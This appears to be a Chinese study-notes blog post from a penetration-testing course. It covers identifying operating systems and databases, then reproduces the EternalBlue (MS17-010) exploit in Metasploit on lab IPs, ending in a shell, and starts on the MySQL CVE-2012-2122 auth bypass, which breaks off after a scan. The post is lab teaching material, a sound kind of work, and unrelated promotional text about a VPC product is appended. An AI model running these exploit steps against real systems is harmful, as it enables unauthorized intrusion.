小迪安全-04

目录

小迪安全-基础入门-系统数据库

简要操作系统层面漏洞影响范围

实例:“永恒之蓝”漏洞复现

Mysql身份认证绕过漏洞(CVE-2012-2122)


小迪安全-基础入门-系统数据库

思维导图:

#操作系统层面

识别操作系统常见方法

  • 大小写-----Windows上不区分大小写,linux区分

  • 也可用工具--Nmap扫描

在扫描windows操作系统时,检测出为windows xp系统,windows防火墙开启的话有可能会扫描不到或者确定不了那个系统版本,nmap会针对版本的可能性列出百分比;

注:Nmap对系统进行识别时并不一定能准确识别,当无法准确识别的时候,使用--osscan-guess (--fuzzy选项可以推测系统并识别,--fuzzy不一起使用。)

  • 不同的操作系统的TTL值不同,可以通过ping命令来观察

Linux系统、Windows7的TTL值为64或255

Windows NT/2000/XP系统的TTL值为128

Windows 98系统的TTL值为32

UNIX主机的TTL值为255。

简要操作系统层面漏洞影响范围
  • 权限

  • 简单的干扰

  • 使服务崩溃

(注:静态网站没有漏洞,因为没有数据传递)

##数据库层面

识别数据库类型的常见方法

  • 根据数量(组合):

小型数据库:ASP+Access.....

中型数据库:php+mysql、asp+mssql

大型数据库:sql server 、jsp+mssq、Oracle、python+mongodb

  • 利用端口扫描(Nmap)

数据库打开时一般会有默认端口打开:

Mysql:3306 Mssql:1433

Oracle:1521 mongodb:27017

...................

识别意义:1.每个数据库的安全机制与写法结构都不一样,从而产生的漏洞也不同;2.不仅有存储上的区别,还有结构上的区别

常见漏洞类型及攻击:部署问题、离线服务器数据泄露、错误配置的数据库、SQL注入、权限问题、数据库备份被盗

##第三方层面

如何判断有哪些第三方平台或软件

  • 端口扫描看弹出的目录以及版本

  • 看有没有phpadmin

##补充

除去常规wEB安全及APP安全测试外,类似服务器单一或复杂的其他服务|〔邮件,游戏,负载均衡等),也可以作为安全测试目标,此类目标测试原则只是少了wEB应用或其他安全问题。所以明确安全测试思路是很重要的!

实例:“永恒之蓝”漏洞复现
  • 查询ip

  • 测试两台主机的连通性

  • 查询指kali数据库的状态

Payload:service postgresql status

  • 此时就可以进行永恒之蓝漏洞扫描,(永恒之蓝利用的是ms17_010漏洞,因此到这一步之后的任务就是在kali 里寻找ms17_010漏洞,并且利用该漏洞进行攻击,获得windows 7 的管理员权限)

  • 启动msf:msfconsole

msfconsole是一个强大的接口程序。Msfconsole提供一体化的集中控制台。通过msfconsole,可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。Msfconsole还有第三方程序的接口,比如nmap,sqlmap等,可以直接在msfconsole里面使用。

  • 搜索ms17_010:search ms17_010

  • 用use auxiliary/scanner/smb/smb_ms17_010检测一下漏洞

Show options ------查看帮助

  • 测试漏洞是否存在

Payload:set rhosts 192.168.32.141

Run ---攻击

  • 进行攻击:use exploit/windows/smb/ms17_010_eternalblue

  • 获取shell,永恒之蓝成功覆盖。

Mysql身份认证绕过漏洞(CVE-2012-2122)
  • 漏洞描述

    当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。

  • 受影响版本

  • 靶机 ip:192.168.32.154 kali ip:192.168.32.130

  • 先开启vulhub环境

  • 在kali里面进行攻击

扫描版本信息:Payload:nmap -A 192.168.32.154

  • 使用查询出来的模块

  • 33
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
小迪安全是一家网络安全公司,致力于提供云安全解决方案。其中,VPC(Virtual Private Cloud)项目是他们的一项实战项目。 VPC项目旨在帮助客户构建安全可靠的云基础架构。VPC提供了一种虚拟化的网络环境,客户可以在其中创建和管理自己的虚拟私有网络。这个网络与其他云资源隔离,并且可以按需自定义网络拓扑、IP地址范围、子网等。 在该实战项目中,小迪安全为客户提供全方位的VPC解决方案。首先,他们与客户合作,进行需求分析和规划,根据客户的业务需求和安全要求定制VPC架构。其次,小迪安全就架构设计给出详细的实施方案,并协助客户在云平台上搭建VPC环境。他们会根据实际情况,对网络拓扑、VPC子网、路由、安全组等进行优化配置,确保网络的灵活性和安全性。 在VPC项目的实施过程中,小迪安全注重安全性。他们会使用防火墙、虚拟专线等技术手段,保障VPC网络的安全防护。同时,他们也提供监控和日志管理等工具,帮助客户实时监测和管理VPC网络的运行状态。 小迪安全的VPC项目实战已经成功服务了多家客户。通过他们的专业能力和经验,客户得以构建高度安全可靠的云基础架构,并且在日常运维中得到专业的支持和保障。 总结来说,小迪安全的VPC项目实战是为客户提供安全可靠的云基础架构解决方案。他们通过需求分析、架构设计、优化配置和安全防护等步骤,帮助客户构建和管理VPC网络,以保障云环境的稳定和安全

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值